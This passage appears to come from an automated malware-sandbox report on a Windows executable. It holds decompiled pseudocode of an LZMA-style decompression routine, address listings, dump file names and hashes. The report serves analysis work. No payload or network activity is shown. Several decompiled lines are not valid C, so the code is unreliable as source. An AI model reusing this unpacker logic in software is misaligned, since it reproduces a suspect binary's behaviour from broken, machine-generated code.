									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x004070ab
0x004070ab
0x004070af
0x00407166
0x00407169
0x00407175
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x004073ce
0x004073ce
0x004073d4
0x004073da
0x004073e0
0x004073fa
0x004073fd
0x00407403
0x0040740e
0x00407410
0x004073e2
0x004073e2
0x004073f1
0x004073f5
0x004073f5
0x0040741a
0x00407441
0x00407441
0x00407447
0x00407447
0x00000000
0x0040741c
0x0040741c
0x00407420
0x004075cf
0x00000000
0x004075cf
0x0040742c
0x00407433
0x0040743b
0x0040743e
0x00000000
0x0040743e
0x004070b5
0x004070b9
0x004075fa
0x004075fa
0x004075fd
0x00407601
0x00407601
0x004070bf
0x004070c5
0x004070c8
0x004070cc
0x004070cf
0x004070d3
0x00407599
0x004075e5
0x004075ed
0x004075f4
0x004075f6
0x00000000
0x004075f6
0x004070d9
0x004070dc
0x004070e2
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x0040710d
0x0040710d
0x0040710d
0x00406be3
0x00406be3
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00000000
0x00406bfd
0x00000000
0x00000000
0x00406c06
0x00406c09
0x00406c0c
0x00406c10
0x00000000
0x00000000
0x00406c16
0x00406c19
0x00406c1b
0x00406c1c
0x00406c1f
0x00406c21
0x00406c22
0x00406c24
0x00406c27
0x00406c2c
0x00406c31
0x00406c3a
0x00406c4d
0x00406c50
0x00406c5c
0x00406c84
0x00406c86
0x00406c94
0x00406c94
0x00406c98
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c88
0x00406c88
0x00406c8b
0x00406c8c
0x00406c8c
0x00000000
0x00406c88
0x00406c62
0x00406c67
0x00406c67
0x00406c70
0x00406c78
0x00406c7b
0x00000000
0x00406c81
0x00406c81
0x00000000
0x00406c81
0x00000000
0x00406c9e
0x00406c9e
0x00406ca2
0x0040754e
0x00000000
0x0040754e
0x00406cab
0x00406cbb
0x00406cbe
0x00406cc1
0x00406cc1
0x00406cc1
0x00406cc4
0x00406cc8
0x00000000
0x00000000
0x00406cca
0x00406cd0
0x00406cfa
0x00406d00
0x00406d07
0x00000000
0x00406d07
0x00406cd6
0x00406cd9
0x00406cde
0x00406cde
0x00406ce9
0x00406cf1
0x00406cf4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d39
0x00406d3f
0x00406d42
0x00406d4f
0x00406d57
0x00000000
0x00000000
0x00406d0e
0x00406d0e
0x00406d12
0x0040755d
0x00000000
0x0040755d
0x00406d1e
0x00406d29
0x00406d29
0x00406d29
0x00406d2c
0x00406d2f
0x00406d32
0x00406d37
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x00000000
0x00406dec
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x00000000
0x00000000
0x00407068
0x0040706c
0x0040708f
0x00407092
0x00407095
0x0040709f
0x0040706e
0x0040706e
0x00407071
0x00407074
0x00407077
0x00407084
0x00407087
0x00407087
0x00000000
0x00000000
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x00000000
0x00407137
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00000000
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x00000000
0x004073c8
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00000000
0x0040753b
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x00000000
0x00407390
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05

Uniqueness

Uniqueness Score: -1.00%

Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
